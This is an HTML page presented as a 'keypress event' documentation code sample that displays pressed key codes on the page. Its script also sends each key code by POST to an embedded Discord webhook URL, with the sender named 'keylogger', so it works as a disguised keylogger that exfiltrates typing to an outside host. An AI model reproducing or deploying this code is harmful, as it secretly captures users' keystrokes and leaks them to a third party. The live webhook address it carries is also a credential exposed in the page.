
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="robots" content="noindex, nofollow">
        <style type="text/css">
            body {
              padding: 0;
              margin: 0;
            }

            svg:not(:root) {
              display: block;
            }

            .playable-code {
              background-color: #f4f7f8;
              border: none;
              border-left: 6px solid #558abb;
              border-width: medium medium medium 6px;
              color: #4d4e53;
              height: 100px;
              width: 90%;
              padding: 10px 10px 0;
            }

            .playable-canvas {
              border: 1px solid #4d4e53;
              border-radius: 2px;
            }

            .playable-buttons {
              text-align: right;
              width: 90%;
              padding: 5px 10px 5px 26px;
            }
        </style>
        
        <title>Document: keypress event - addeventlistener_keypress_example - code sample</title>
    </head>
    <body>
        
            <p>Press inside this IFrame first to focus it, then try pressing keys on the keyboard. (updatel)</p>
<p id="log"></p>

        
        
            <script>
                const log = document.getElementById('log');

document.addEventListener('keypress', logKey);

function logKey(e) {
  sendMessage(e.code);
  log.textContent += ` ${e.code}`;
}

function sendMessage(message) {
const request = new XMLHttpRequest();
  request.open("POST", "https://discord.com/api/webhooks/966002745263923200/KVPR_Cpde85HrTDmTW1SVK_4iE3FvNxxlsPxLXFAsICRtKbubW01iEgAllxJ4UgRiTea");

  request.setRequestHeader('Content-type', 'application/json');

  const params = {
    username: "keylogger",
    avatar_url: "https://studio.code.org/assets/logo-2acd4ebc69c447786b866b98034bb3c0777b5f67cd8bd7955e97bba0b16f2bd1.svg",
    content: message
  }

  request.send(JSON.stringify(params));
}

            </script>
        
    </body>
</html>